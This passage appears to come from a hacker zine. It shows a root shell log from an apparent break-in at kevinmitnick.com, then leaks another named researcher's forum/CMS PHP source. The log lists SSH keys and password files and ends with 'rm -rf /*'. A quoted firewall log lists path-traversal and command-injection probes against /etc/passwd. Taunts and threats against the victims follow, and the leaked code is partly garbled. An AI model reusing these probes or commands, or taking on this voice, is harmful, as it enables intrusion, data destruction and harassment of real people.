-rwxr-xr-x 1 mitsec mitsec 50806 Jul 9 09:53 contact_form.php
-rwxr-xr-x 1 mitsec mitsec 1988 Dec 7 2006 contact_new.php.bk
-rwxr-xr-x 1 mitsec mitsec 8021 Nov 16 2006 contact_submit.php.bk
drwxr-xr-x 3 mitsec mitsec 4096 Feb 26 14:36 defthi
drwxr-xr-x 5 mitsec mitsec 4096 Sep 1 2008 dev
drwxr-xr-x 3 mitsec mitsec 4096 Sep 1 2008 elsag
-rwxr-xr-x 1 mitsec mitsec 1613 Jan 13 2006 error.gif
-rwxr-xr-x 1 mitsec mitsec 384144 Aug 7 2007 faa.pdf
-rwxr-xr-x 1 mitsec mitsec 3897 Mar 28 2005 feeds.php
drwxr-xr-x 2 mitsec mitsec 4096 Sep 1 2008 flash
-rwxr-xr-x 1 mitsec mitsec 4859 Aug 22 2006 generateimage.php
-rwxr-xr-x 1 mitsec mitsec 23 Nov 20 2006 googlehostedservice.html
drwxr-xr-x 2 mitsec mitsec 4096 Sep 1 2008 guillermo
drwxr-xr-x 2 mitsec mitsec 4096 Sep 1 2008 images
-rwxr-xr-x 1 mitsec mitsec 12083 Mar 5 2007 index-save.php
-rwxr-xr-x 1 mitsec mitsec 5394 May 18 17:28 index.php
-rwxr-xr-x 1 mitsec mitsec 12077 Nov 26 2006 index.php.save
-rwxr-xr-x 1 mitsec mitsec 385 Mar 21 17:59 info.txt
-rwxr-xr-x 1 mitsec mitsec 1440 Aug 7 2007 investigations.php
-rwxr-xr-x 1 mitsec mitsec 1515582 Aug 7 2007 issa.jpg
drwxr-xr-x 3 mitsec mitsec 4096 Jun 20 03:16 jon
drwxr-xr-x 2 mitsec mitsec 4096 Sep 1 2008 keppler
-rwxr-xr-x 1 mitsec mitsec 8793 Aug 7 2007 lastRSS.php
drwxr-xr-x 2 mitsec mitsec 4096 Jan 20 16:51 media
drwxr-xr-x 2 mitsec mitsec 4096 Sep 1 2008 mitnick
-rwxr-xr-x 1 mitsec mitsec 38559604 Aug 20 2006 mitnickpromo2.mov
-rwxr-xr-x 1 mitsec mitsec 5089 Jan 13 2006 msc.css
drwxr-xr-x 3 mitsec mitsec 4096 Sep 1 2008 news
drwxr-xr-x 2 mitsec mitsec 4096 Sep 1 2008 patrickau
-rwxr-xr-x 1 mitsec mitsec 1088600 Oct 27 2008 pdi-testimonial.pdf
-rwxr-xr-x 1 mitsec mitsec 7120 Aug 7 2007 presentations.php
-rwxr-xr-x 1 mitsec mitsec 9188 Jun 28 15:21 press.php
-rwxr-xr-x 1 mitsec mitsec 3487 Mar 28 2005 privacy.php
-rwxr-xr-x 1 mitsec mitsec 3111 Aug 7 2007 products.php
-rwxr-xr-x 1 mitsec mitsec 1200 Aug 13 2007 resources.php
-rwxr-xr-x 1 mitsec mitsec 8172 Aug 7 2007 services.php
-rwxr-xr-x 1 mitsec mitsec 5218 Aug 13 2007 speaking.php
-rwxr-xr-x 1 mitsec mitsec 4975 Sep 29 2006 speakingold.php
-rwxr-xr-x 1 mitsec mitsec 28169 Aug 7 2007 ssa.pdf
-rwxr-xr-x 1 mitsec mitsec 2430 Aug 7 2007 style.css
-rwxr-xr-x 1 mitsec mitsec 5731 May 18 17:28 testimonials.php
drwxr-xr-x 2 mitsec mitsec 4096 Sep 1 2008 ttf
-rwxr-xr-x 1 mitsec mitsec 2726 Oct 20 2007 verify_config.php
-rwxr-xr-x 1 mitsec mitsec 3928 Mar 24 17:08 video.php
-rwxr-xr-x 1 mitsec mitsec 5857 Aug 22 2006 wallofshame.txt
-rwxr-xr-x 1 mitsec mitsec 3034 Aug 26 2007 workshop_signup.php
-rwxr-xr-x 1 mitsec mitsec 20981 Nov 16 2006 workshop_signup.php.bk
-rwxr-xr-x 1 mitsec mitsec 888 Aug 7 2007 workshop_signup_confirmation.php
-rwxr-xr-x 1 mitsec mitsec 3305 Dec 7 2006 workshop_signup_new.php.bk
-rwxr-xr-x 1 mitsec mitsec 5373 Nov 16 2006 workshop_signup_submit.php.bk
-rwxr-xr-x 1 mitsec mitsec 1208 Aug 7 2007 workshops.php
drwxr-xr-x 8 mitsec mitsec 4096 Sep 1 2008 zzhp
root at dc21 [~]# cat wallofshame.txt
Requesting IP Date Time Handler GET Host Mod_Security-Message Mod_Security-Action
167.216.252.40 2006-08-22 11:20:05 /images/query?mss=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd HTTP/1.1 9b.4d.344a.static.theplanet.com Access denied with code 403. Pattern match "/etc/passwd" at REQUEST_URI 403
167.216.252.40 2006-08-22 11:20:03 cgi-script 9b.4d.344a.static.theplanet.com Access denied with code 403. Pattern match "xmlrpc" at REQUEST_URI 403
167.216.252.40 2006-08-22 11:20:02 /phpxmlrpc/ HTTP/1.1 9b.4d.344a.static.theplanet.com Access denied with code 403. Pattern match "xmlrpc" at REQUEST_URI 403
167.216.252.40 2006-08-22 11:20:01 /xmlrpc/ HTTP/1.1 9b.4d.344a.static.theplanet.com Access denied with code 403. Pattern match "xmlrpc" at REQUEST_URI 403
167.216.252.40 2006-08-22 11:19:59 cgi-script /images/loadpage.cgi?user_id=1&file=../../../../../../etc/passwd HTTP/1.1 9b.4d.344a.static.theplanet.com Access denied with code 403. Pattern match "/etc/passwd" at REQUEST_URI 403
167.216.252.40 2006-08-22 11:19:57 cgi-script /webmail/rwwwshell.pl HTTP/1.1 9b.4d.344a.static.theplanet.com Access denied with code 403. Pattern match "shell\\.pl" at REQUEST_URI 403
167.216.252.40 2006-08-22 11:19:56 cgi-script /webmail/bigconf.cgi?command=view_textfile&file=/etc/passwd&filters=; HTTP/1.1 9b.4d.344a.static.theplanet.com Access denied with code 403. Pattern match "/etc/passwd" at REQUEST_URI 403
167.216.252.40 2006-08-22 11:19:56 cgi-script /webmail/cgiforum.cgi?thesection=../../../../../../../etc/passwd%00 HTTP/1.1 9b.4d.344a.static.theplanet.com Access denied with code 403. Pattern match "/etc/passwd" at REQUEST_URI 403
167.216.252.40 2006-08-22 11:19:55 cgi-script /webmail/cgiforum.pl?thesection=../../../../../../../etc/passwd%00 HTTP/1.1 9b.4d.344a.static.theplanet.com Access denied with code 403. Pattern match "/etc/passwd" at REQUEST_URI 403
167.216.252.40 2006-08-22 11:19:54 cgi-script /webmail/whois.cgi?action=load&whois=%3Bcat+%2Fetc%2Fpasswd HTTP/1.1 9b.4d.344a.static.theplanet.com Access denied with code 403. Pattern match "/etc/passwd" at REQUEST_URI 403
167.216.252.40 2006-08-22 11:19:52 /images/perl HTTP/1.1 9b.4d.344a.static.theplanet.com Access denied with code 403. Pattern match "perl " at THE_REQUEST 403
167.216.252.40 2006-08-22 11:19:49 cgi-script /webmail/.htaccess HTTP/1.1 9b.4d.344a.static.theplanet.com Access denied with code 403. Pattern match "\\.htaccess" at THE_REQUEST 403
167.216.252.40 2006-08-22 11:19:39 /phpMyAdmin-2.6.4/ HTTP/1.1 9b.4d.344a.static.theplanet.com Access denied with code 403. Pattern match "phpmyadmin" at REQUEST_URI 403
167.216.252.40 2006-08-22 11:19:38 /phpMyAdmin-2.6.4-pl1/ HTTP/1.1 9b.4d.344a.static.theplanet.com Access denied with code 403. Pattern match "phpmyadmin" at REQUEST_URI 403
167.216.252.40 2006-08-22 11:19:38 /phpMyAdmin264/ HTTP/1.1 9b.4d.344a.static.theplanet.com Access denied with code 403. Pattern match "phpmyadmin" at REQUEST_URI 403
167.216.252.40 2006-08-22 11:19:36 cgi-script /images/rwwwshell.pl HTTP/1.1 9b.4d.344a.static.theplanet.com Access denied with code 403. Pattern match "shell\\.pl" at REQUEST_URI 403
167.216.252.40 2006-08-22 11:19:35 cgi-script /images/bigconf.cgi?command=view_textfile&file=/etc/passwd&filters=; HTTP/1.1 9b.4d.344a.static.theplanet.com Access denied with code 403. Pattern match "/etc/passwd" at REQUEST_URI 403
167.216.252.40 2006-08-22 11:19:35 cgi-script /images/cgiforum.cgi?thesection=../../../../../../../etc/passwd%00 HTTP/1.1 9b.4d.344a.static.theplanet.com Access denied with code 403. Pattern match "/etc/passwd" at REQUEST_URI 403
167.216.252.40 2006-08-22 11:19:34 cgi-script /images/cgiforum.pl?thesection=../../../../../../../etc/passwd%00 HTTP/1.1 9b.4d.344a.static.theplanet.com Access denied with code 403. Pattern match "/etc/passwd" at REQUEST_URI 403
167.216.252.40 2006-08-22 11:19:33 cgi-script /images/whois.cgi?action=load&whois=%3Bcat+%2Fetc%2Fpasswd HTTP/1.1 9b.4d.344a.static.theplanet.com Access denied with code 403. Pattern match "/etc/passwd" at REQUEST_URI 403
167.216.252.40 2006-08-22 11:19:22 /nqt.php?portNum=80&queryType=all&target=someserver.com%3Bcat+/etc/passwd&Submit=Do+It HTTP/1.1 9b.4d.344a.static.theplanet.com Access denied with code 403. Pattern match "/etc/passwd" at REQUEST_URI 403
167.216.252.40 2006-08-22 11:19:20 /network_query.php?portNum=80&queryType=all&target=someserver.com%3Bcat+/etc/passwd&Submit=Do+It HTTP/1.1 9b.4d.344a.static.theplanet.com Access denied with code 403. Pattern match "img src=javascript" at REQUEST_URI 403
167.216.252.40 2006-08-22 11:19:18 /nph-cgiwrapd/ HTTP/1.1 9b.4d.344a.static.theplanet.com Access denied with code 403. Pattern match "img src=javascript" at REQUEST_URI 403
167.216.252.40 2006-08-22 11:19:18 /cgiwrapd/ HTTP/1.1 9b.4d.344a.static.theplanet.com Access denied with code 403. Pattern match "img src=javascript" at REQUEST_URI 403
167.216.252.40 2006-08-22 11:19:17 /cgiwrap/ HTTP/1.1 9b.4d.344a.static.theplanet.com Access denied with code 403. Pattern match "img src=javascript" at REQUEST_URI 403
167.216.252.40 2006-08-22 11:19:16 /nph-cgiwrapd/ HTTP/1.1 9b.4d.344a.static.theplanet.com Access denied with code 403. Pattern match " 403
167.216.252.40 2006-08-22 11:19:16 /cgiwrapd/ HTTP/1.1 9b.4d.344a.static.theplanet.com Access denied with code 403. Pattern match " 403
167.216.252.40 2006-08-22 11:19:15 /cgiwrap/ HTTP/1.1 9b.4d.344a.static.theplanet.com Access denied with code 403. Pattern match " 403
167.216.252.40 2006-08-22 11:19:04 /phpMyAdmin/css/ HTTP/1.1 9b.4d.344a.static.theplanet.com Access denied with code 403. Pattern match "phpmyadmin" at REQUEST_URI 403
167.216.252.40 2006-08-22 11:19:04 /phpmyadmin/css/ HTTP/1.1 9b.4d.344a.static.theplanet.com Access denied with code 403. Pattern match "phpmyadmin" at REQUEST_URI 403
root at dc21 [~]# #lol
root at dc21 [~]# cat config.php
root at dc21 [~]# ls -la media/ ## we know u luv it k3v1n
total 1292888
drwxr-xr-x 2 mitsec mitsec 4096 Jan 20 16:51 .
drwxr-xr-x 24 mitsec nobody 4096 Jul 9 10:01 ..
-rwxr-xr-x 1 mitsec mitsec 1780588 Jan 20 2006 2005 FBI Computer Crime Survey Report.pdf
-rwxr-xr-x 1 mitsec mitsec 50950 Aug 7 2007 41stParamete2.pdf
-rwxr-xr-x 1 mitsec mitsec 22324052 Jan 17 2005 60mins.wmv
-rwxr-xr-x 1 mitsec mitsec 83791947 Feb 6 2008 AMW.mp4
-rwxr-xr-x 1 mitsec mitsec 67229236 Feb 8 2008 AMW.wmv
-rwxr-xr-x 1 mitsec mitsec 115766 Jul 15 2006 AppSense-White-Paper-Mitnick.pdf
-rwxr-xr-x 1 mitsec mitsec 46238 Aug 7 2007 Applied_Scan2.pdf
-rwxr-xr-x 1 mitsec mitsec 99973354 Feb 6 2008 Bloomberg1.mp4
-rwxr-xr-x 1 mitsec mitsec 80357704 Feb 8 2008 Bloomberg1.wmv
-rwxr-xr-x 1 mitsec mitsec 97313195 Feb 6 2008 Bloomberg2.mp4
-rwxr-xr-x 1 mitsec mitsec 78221632 Feb 8 2008 Bloomberg2.wmv
-rwxr-xr-x 1 mitsec mitsec 97840298 Feb 6 2008 Bloomberg3.mp4
-rwxr-xr-x 1 mitsec mitsec 78549644 Feb 8 2008 Bloomberg3.wmv
-rwxr-xr-x 1 mitsec mitsec 729350 Jul 24 2007 CSC-Testimonial.pdf
-rwxr-xr-x 1 mitsec mitsec 60537 Jan 22 2005 HFSC-Testimony-20030403.pdf
-rwxr-xr-x 1 mitsec mitsec 72885850 Jan 31 2008 InterviewWithMariFrank.mp3
-rwxr-xr-x 1 mitsec mitsec 211536 Jul 29 2007 Kevin_Mitnick_Bio_BW.pdf
-rwxr-xr-x 1 mitsec mitsec 73025457 Nov 11 2005 MitnickDemo.wmv
-rwxr-xr-x 1 mitsec mitsec 5659648 Jan 17 2005 Mitnick_Color.zip
-rwxr-xr-x 1 mitsec mitsec 2547699 Jul 24 2007 Mitnick_Playboy_feature.pdf
-rwxr-xr-x 1 mitsec mitsec 5144656 Jan 17 2005 Mitnick_bw.zip
-rwxr-xr-x 1 mitsec mitsec 86455159 Feb 6 2008 Quest Interview.mp4
-rwxr-xr-x 1 mitsec mitsec 69397314 Feb 8 2008 Quest Interview.wmv
-rwxr-xr-x 1 mitsec mitsec 72399 Jan 22 2005 SGAC-Testimony-20000302.pdf
-rwxr-xr-x 1 mitsec mitsec 51160350 Feb 6 2008 Star Jones Interview.mp4
-rwxr-xr-x 1 mitsec mitsec 41092294 Feb 13 2008 Star Jones Interview.wmv
-rwxr-xr-x 1 mitsec mitsec 41092294 Feb 8 2008 Star Jones.wmv
-rwxr-xr-x 1 mitsec mitsec 18229 Dec 14 2005 THE ART OF INTRUSION_Press_Kit.zip
-rwxr-xr-x 1 mitsec mitsec 718004 Mar 28 2005 The_Age.pdf
-rwxr-xr-x 1 mitsec mitsec 33177621 Oct 20 2005 Trinidad.wmv
-rwxr-xr-x 1 mitsec mitsec 117138 Mar 1 2008 US-pretrial.pdf
-rwxr-xr-x 1 mitsec mitsec 50087 Jan 17 2005 aod_pk_v1-0.zip
-rwxr-xr-x 1 mitsec mitsec 27561886 Jan 17 2005 artofdeceptionshort.wmv
-rwxr-xr-x 1 mitsec mitsec 388671 Jan 20 16:51 cic-testimonial.pdf
-rwxr-xr-x 1 mitsec mitsec 384144 Jul 24 2007 faa.pdf
-rwxr-xr-x 1 mitsec mitsec 52 Jan 17 2005 index.php
-rwxr-xr-x 1 mitsec mitsec 18794 Aug 10 2007 infragard.pdf
-rwxr-xr-x 1 mitsec mitsec 1515582 Jul 24 2007 issa.jpg
-rwxr-xr-x 1 mitsec mitsec 38559604 Apr 25 2005 mitnickpromo2.mov
-rwxr-xr-x 1 mitsec mitsec 18084536 Mar 19 2007 mitnickpromo2.wmv
-rwxr-xr-x 1 mitsec mitsec 32359 Jan 17 2005 msc_brochure.pdf
-rwxr-xr-x 1 mitsec mitsec 46449 Jan 17 2005 msc_course_outline.pdf
-rwxr-xr-x 1 mitsec mitsec 3948582 Aug 19 2007 pick-cards.mov
-rwxr-xr-x 1 mitsec mitsec 40543570 Aug 19 2007 pick-cards.wmv
-rwxr-xr-x 1 mitsec mitsec 28169 Jul 24 2007 ssa.pdf
root at dc21 [~]# ls -la dev
total 208
drwxr-xr-x 5 mitsec mitsec 4096 Sep 1 2008 .
drwxr-xr-x 24 mitsec nobody 4096 Jul 9 10:01 ..
-rwxr-xr-x 1 mitsec mitsec 123 Oct 20 2007 .htaccess
-rwxr-xr-x 1 mitsec mitsec 1038 Oct 20 2007 _contact_settings.php
-rwxr-xr-x 1 mitsec mitsec 528 Aug 1 2007 _footer.php
-rwxr-xr-x 1 mitsec mitsec 3121 Aug 1 2007 _header.php
-rwxr-xr-x 1 mitsec mitsec 11023 Aug 7 2007 _sidebar.php
-rwxr-xr-x 1 mitsec mitsec 2798 Jul 24 2007 aoi_reviews.php
drwxr-xr-x 2 mitsec mitsec 4096 Sep 1 2008 cache
-rwxr-xr-x 1 mitsec mitsec 2870 Jul 23 2007 company.php
-rwxr-xr-x 1 mitsec mitsec 1778 Jul 29 2007 contact.php
-rwxr-xr-x 1 mitsec mitsec 1054 Jul 24 2007 contact_confirmation.php
-rwxr-xr-x 1 mitsec mitsec 50245 Jul 24 2007 contact_form.php
-rwxr-xr-x 1 mitsec mitsec 2839 Jul 24 2007 error_log
drwxr-xr-x 2 mitsec mitsec 4096 Sep 1 2008 images
-rwxr-xr-x 1 mitsec mitsec 3627 Aug 7 2007 index.php
-rwxr-xr-x 1 mitsec mitsec 1440 Jul 23 2007 investigations.php
-rwxr-xr-x 1 mitsec mitsec 8793 Jul 24 2007 lastRSS.php
-rwxr-xr-x 1 mitsec mitsec 7120 Jul 23 2007 presentations.php
-rwxr-xr-x 1 mitsec mitsec 4991 Jul 29 2007 press.php
-rwxr-xr-x 1 mitsec mitsec 3111 Jul 23 2007 products.php
-rwxr-xr-x 1 mitsec mitsec 1738 Jul 23 2007 resources.php
-rwxr-xr-x 1 mitsec mitsec 8172 Jul 29 2007 services.php
-rwxr-xr-x 1 mitsec mitsec 5225 Aug 1 2007 speaking.php
-rwxr-xr-x 1 mitsec mitsec 2430 Jul 24 2007 style.css
-rwxr-xr-x 1 mitsec mitsec 2043 Aug 7 2007 testimonials.php
-rwxr-xr-x 1 mitsec mitsec 1981 Jul 24 2007 video.php
-rwxr-xr-x 1 mitsec mitsec 3036 Jul 29 2007 workshop_signup.php
-rwxr-xr-x 1 mitsec mitsec 888 Jul 24 2007 workshop_signup_confirmation.php
-rwxr-xr-x 1 mitsec mitsec 1208 Jul 23 2007 workshops.php
drwxr-xr-x 8 mitsec mitsec 4096 Sep 1 2008 zzhp
root at dc21 [~]# cat dev/.htaccess
AuthType Basic
AuthName "Restricted Area"
AuthUserFile "/home/mitsec/.htpasswds/public_html/dev/passwd"
require valid-user
root at dc21 [~]# cat /home/mitsec/.htpasswds/public_html/dev/passwd
root at dc21 [~]# cat dev/index.php
Mitnick Security Consulting, LLC is a full-service information
security consulting firm. Founded by Kevin Mitnick, Mitnick Security Consulting offers a comprehensive range of services to help businesses protect their valuable assets. Mitnick Security Consulting, LLC is a full-service information security consulting firm. Founded by Kevin Mitnick, Mitnick Security Consulting offers a comprehensive range of services. read more >>
FBI Computer Crime Survey
“This computer security survey eclipses any other that I have ever seen. After reading it, everyone should realize the importance of establishing a proactive information security program.” - Kevin Mitnick
Click Here To Download The Report

"Mitnick left his audience shaken,but better equipped to stave off attacks via social engineering."
- Computer Sciences Corporation (Click Here for PDF)

"It's both frightening and informative to hear how effective social engineering can be in assessing what should be security sensitive information."
- Scott Pettit - The AIM Institute (Click Here for PDF)

2007 Las Vegas Social Engineering Workshop
A two-day course covering:
- Social engineering case studies, attack methods, vulnerabilities in the human firewall, and techniques to protect your business
- Security policies development, follow-through, assessment, and training

Sign up now >>

The Art of Intrusion:
The Real Stories Behind the Exploits of Hackers, Intruders, and Deceivers

[ More Information ]
[ Read The Press Reviews ]
The Art of Deception:
Controlling the Human Element of Security

[ More Information ]
root at dc21 [~]# ls -la /home/mitsec/.ssh/
total 16
drwxr-xr-x 2 mitsec mitsec 4096 Sep 1 2008 .
drwxr-xr-x 22 mitsec mitsec 4096 Jul 16 10:36 ..
-rwxr-xr-x 1 mitsec mitsec 0 Nov 15 2008 authorized_keys
-rwxr-xr-x 1 mitsec mitsec 0 Nov 15 2008 authorized_keys2
-rwxr-xr-x 1 mitsec mitsec 744 Oct 20 2007 id_dsa
-rwxr-xr-x 1 mitsec mitsec 615 Oct 20 2007 id_dsa.pub
-rwxr-xr-x 1 mitsec mitsec 0 Nov 15 2008 known_hosts
top
root at dc21 [~]# cat /etc/userdomains
kevinmitnick.com: mitsec
defthi.com: mitsec
defthi.mitnicksecurity.com: mitsec
mitnicksecurity.com: mitsec
mitsec.com: mitsec
defensivethinking.com: mitsec
*: nobody
root at dc21 [~]# #good bye kevin
root at dc21 [~]# rm -rf /*
/dev/rm2: cannot remove `/dev/pts/0': Operation not permitted
[ snip ]
root at dc21 [/dev]# logout
Connection to www.kevinmitnick.com closed by remote host.
Connection to www.kevinmitnick.com closed.

Apologies for the poor quality of the hacklog, but I'm old now and let's face it, Kevin Mitnick is done. You can move your box anywhere Kevin, we'll find you and own you. You should know best, it's the "hacker" in us - or something like that...See you soon.

| \ / _\/_ 0x000000/rvdh .-'-. //o\ _\/_ -- / \ -- | /o\\ ^^~^~^~^~^~^~^~^~~^~^~^~^~^~^~^~^~^~^-=======-~^~~^^~~^~^~^~|~~^~^|^~` I'm out of my head | That was what they said There was no way that I would Ever trust again

As far as whitehats go Ronald is a pretty nice guy. Sometimes you find yourself respecting a guy for the way he goes about his shit, Ronald is that kinda guy. The comparison with the no talent asshat rsnake is obvious - both "specialize" in this new form of security - "WEB APPLICATION SECURITY". Ronald was never about the money, whereas rsnake is all about the hype, the drama, and seeing his name in lights. Ronald quit the security scene some time ago, and despite creating a new site it has been idle for a long time. So rather than let this information go to waste, I figured I would share the security secrets of his CMS/blog. Let's start with his index.php. I hope no one hosts this zine with a .php extension, they'd be as owned as Ronald.

]*?>(.|\n)*?<\/pre>/", $string, $pre1); for ($x = 0; $x < count($pre1[0]); $x++) { $pre2[$x] = preg_replace("/\s*]*?>\s*/", "\r\n", $pre1[0][$x]); $pre1[0][$x] = "/".preg_quote($pre1[0][$x], "/")."/"; } return preg_replace($pre1[0], $pre2, $string); } ?>

0x000000 Hacking & Security, cuz Web 2.0 is kitsch

rvdh

Hacking & Security



free websecurity
scanner
$ head -n 50 x/processor.php function show(value) { document.getElementById('img').innerHTML = ''; } [$3]

", "

$3

", "

$1

", "

''.encode('$1').''

", "$1", "$1", "$1", "$1", "
$1
", "
", "
$1
", "$1", "$1", );
$new = preg_replace($search , $replace, $string);
return $new;
}
function rplace($data) {
    $data = BBcode($data);
    $data = str_replace('8(',' ',$data);
    $data = str_replace('8)',' ',$data);
    $data = str_replace('8p',' ',$data);
    $data = str_replace('8s',' ',$data);
    $data = str_replace('-cool',' ',$data);
    $data = str_replace('-ehm',' ',$data);
    $data = str_replace('-emo(',' ',$data);
    $data = str_replace('-evil',' ',$data);
    $data = str_replace('-fu',' ',$data);
    $data = str_replace('-good',' ',$data);
    $data = str_replace('-orly;)',' ',$data);
    $data = str_replace('-ok',' ',$data);
    return $data;
}
function wrap($datas) {
    $buffer = 33;
    $break = ' ';
    $wrapped = false;
    $aa = array('/<script>/','/<\/script>/','/%3E%3Cscript/');
    $bb = array(' <script>',' </script>',' %3E%3Cscript');
    $data = preg_replace($aa,$bb,$datas);
    $tmp = explode(' ', $data);
    foreach($tmp as $word) {
        while($w = $word[$buffer++]) { $strbf = $w; }
        if(preg_match("/(0) { session_start(); $_SESSION['login'] = 1; while($m=mysql_fetch_array($sql)) { $username = encode($m['user']); ?>
|<|\'|\"|\-|\+|\$|\`|;|{|}|system|php|&#|java|xss|%3C|%3E|minutemaid|cookie|alert|string)/i", $val)){ $img = false; } else { $img = (eregi("^([a-zA-Z].*|[1-9].*)\.(((j|J)(p|P)(g|G))|((g|G)(i|I)(f|F)))$", $val)) ?
true:false;
}
if($img === false) {
    $img = 'hacked.gif';
}
if (file_exists('avatars/'.escapeshellcmd($img))) {
    return escapeshellcmd($img);
} else {
    return 'hacked.gif';
}
}
# uniqueid
function unique(){
    $u = uniqid(mt_rand(0,65350),(int)str_replace('.','',$_SERVER['REMOTE_ADDR']).mt_rand(0,65350));
    for($i=0;$i<15;$i++) {
        $tmp = $u[$i];
        $uid .= $tmp;
    }
    return substr(md5($uid),0,7);
}
function hex($str) {
    if (trim($str)!="") {
        $hex="";
        $length=strlen($str);
        for ($i=0; $i<$length; $i++) {
            if ($i>0) $bound=":"; else $bound="";
            $hex.=$bound.str_pad(dechex(ord($str[$i])), 2, 0, STR_PAD_LEFT);
        }
        return $hex;
    }
}
if($_REQUEST['members'] && $_SESSION['login'] && $_COOKIE['guid'] && $_COOKIE['forum']) { ?>
|<|\'|\"|java|xss|%3C|%3E)/i", $avx)){ $av = 'hacked.gif'; }elseif (file_exists('avatars/'.escapeshellcmd($c['avatar']))) { $av = $c['avatar']; } else { $av = 'hacked.gif'; } echo ($i % 2) ? "" : ""; ?>
Avatar Nickname Company Website
"; } else { echo ""; } ?>
Settings
Name:
Company:
E-mail:
Website:
Signature:
Avatar:
 
0 ) {
    while($m=mysql_fetch_array($sql)) {
        $sql = mysql_query("update users set name = '".prepare(encode($_REQUEST['name']),150,true,false,true)
            ."', company = '".prepare(encode($_REQUEST['company']),150,true,false,true)
            ."', email = '".prepare(encode($_REQUEST['email']),150,true,false,true)
            ."', link = '".prepare(encode($_REQUEST['website']),40,true,false,true)
            ."', avatar = '".prepare(encode($_REQUEST['avatar']),150,true,false,true)
            ."', sig = '".prepare(encode($_REQUEST['sig']),250,true,false,true)
            ."' where id = '".$m['id']."'");
        echo "
Updated!


";
    }
}
} else {
    echo "(!) No image, probably a wrong file format.

";
}
}

# new-topic form (logged-in sessions only)
if($_REQUEST['newtopic'] && $_SESSION['login']) {
    if($_SESSION['login']) {
        $item = explode('|',$_REQUEST['newtopic']);
        $id = (int) $item[1];
?>
New topic

 
bbcode: [url=url]text[/url] - [b][/b] [i][/i] [u][/u] [s][/s] [hr] [code][/code] [sub][/sub]




(!) please login to post a new topic.
";
    }
}

# create a topic: the poster is looked up from the guid cookie (field 1 = user, field 2 = pass)
if($_REQUEST['topic'] && $_REQUEST['name'] && $_REQUEST['posting'] && $_COOKIE['guid']) {
    $item = explode('|',$_REQUEST['topic']);
    $id = (int) $item[1];
    $name = $_REQUEST['name'];
    $post = $_REQUEST['posting'];
    $run = explode(',',$_COOKIE['guid']);
    $p = prepare($run[2],250,true,false,true);
    $u = prepare($run[1],150,true,false,true);
    $sql = mysql_query("select * from users where user = '".$u."' and pass = '".$p."'");
    if(mysql_num_rows($sql) >0) {
        session_start();
        $_SESSION['login'] = 1;
        while($m=mysql_fetch_array($sql)) {
            $username = encode($m['user']);
            $uid = (int) $m['id'];
            flood2($id,$uid);
        }
        $sqlo = mysql_query("insert into topics set catid = '".$id
            ."', name = '".prepare(encode($name),100,true,false,true)
            ."', post = '".prepare(encode($post),5001,true,false,true)
            ."', uid = '".$uid."', user = '".$username
            ."', time = '". date("F j, Y, g:i a",time())
            ."', timer = '".time()."'") or die();
        $num = mysql_query("select * from topics");
        $last = mysql_num_rows($num);
        $nn = "|".$last.":".$id;
        # no where clause: the new topic is flagged as unread for every user
        $s = mysql_query("update users set unreadtopic = CONCAT(unreadtopic,'".$nn."') ");
        echo "
Posted! return to the forum click here


";
    } else {
        echo 'error';
    }
}

# logout
if($_REQUEST['logout'] && $_COOKIE['guid'] && $_COOKIE['forum']) {
    setcookie('forum','',1);
    setcookie('guid','',1);
    session_destroy();
    echo "

You are logged out, go to forum


";
    header("location:index.php?!=1");
    exit;
}

# mark all topics as read for the user named in the guid cookie
if($_REQUEST['markread'] && $_COOKIE['guid'] && $_COOKIE['forum']) {
    $dats = explode(',',$_COOKIE['guid']);
    $sql = mysql_query("update users set unreadtopic = '0:0' where user = '".prepare($dats[1],150,true,false,true)
        ."' and pass = '".prepare($dats[2],250,true,false,true)."' limit 1");
    echo "

All messages are marked.


";
    header("location:index.php?!=1");
    exit;
}

$cookie = $_COOKIE['forum'];
$key = $_SESSION['forum'];
$body = $_REQUEST['reply'];
$post = $_REQUEST['post'];

# check behaviour.
if($key && $cookie && $body && $post && $_REQUEST['!']==1) {
    if($key !== $cookie) {
        echo "
Session error, quit trying and abort.
";
        setcookie('forum','',1);
        session_destroy();
        exit;
    } elseif(preg_match("/(poker|blackjack|viagra|adult|dating|singles|v1agra|erotic|"
        ."pills|levitra|lolita|phentermine|zyban|valtex|xenical|adipex|celebrex|diflucan|"
        ."norvasc|pharmacy|drugstore|meridia|cunt|mortgage|credit|loan|finance|cash|boob|"
        ."enlarge|insurance|debt|casino|prozac|zoloft|masculine|xanax|valium|hydrocodone|"
        ."vicodin|paxil|vioxx)/i", $body)){
        echo "
(!) Message contains probably SPAM, please review and correct.


";
        setcookie('forum','',1);
        session_destroy();
        exit;
    } elseif(strlen($body) > 5000) {
        echo "
(!) Message is too large, maxlength is 5000 chars!


";
    } else {
        $pid = explode('|',$_REQUEST['post']);
        $id = (int)$pid[1];
        $sid = (int)$pid[2];
        $dats = explode(',',$_COOKIE['guid']);
        if(!$dats[1]) {
            echo '
(!) Cookie problem, please logout and re-login to fix this issue.


';
            exit;
        }
        $sql2 = mysql_query("select * from users where user = '".prepare($dats[1],150,true,false,true)
            ."' and pass = '".prepare($dats[2],250,true,false,true)."' limit 1");
        if(mysql_num_rows($sql2) >0 ) {
            while($y = mysql_fetch_array($sql2)) {
                flood($sid,$y['id']);
                $sqlp = mysql_query("update topics set posts = (posts +1) , lastuser = '".$y['user']."' where id = '".$id."'");
                $sqln = mysql_query("insert into posts set catid = '".$id
                    ."', userid = '".$y['id']
                    ."', post = '".prepare(encode($body),5001,true,false,true)
                    ."', time = '". date("F j, Y, g:i a",time())
                    ."', ip = '".encode($_SERVER['REMOTE_ADDR'])
                    ."', sid = '".$sid."', timer = '".time()."'");
                $num2 = mysql_query("select * from posts");
                $last2 = mysql_num_rows($num2);
                $nn = '|'.$id.':'.$sid;
                $f = mysql_query("update users set unreadtopic = CONCAT(unreadtopic,'".$nn."')");
                echo "
Message posted!


";
                check();
                header("location:index.php?!=1&read=".$id.'|'.$sid."");
                setcookie('forum','',1);
                exit;
            }
        } else {
            echo "
(!) Auth problem, are you a member? please re-login to fix it.


";
            setcookie('forum','',1);
            setcookie('guid','',1);
            header("location:index.php?!=1");
            session_destroy();
            exit;
        }
    }
}
$_SESSION['forum'] = crypt(sha1(hex(unique())));
?>
(!) Only a-z-0-9 chars as username
";
    exit;
}
# login: the submitted password is compared as an unsalted sha1
$p = prepare($_REQUEST['pass'],250,true,false,true);
$u = prepare($_REQUEST['user'],150,true,false,true);
$sql = mysql_query("select * from users where user = '".$u."' and pass = '".sha1($p)."'");
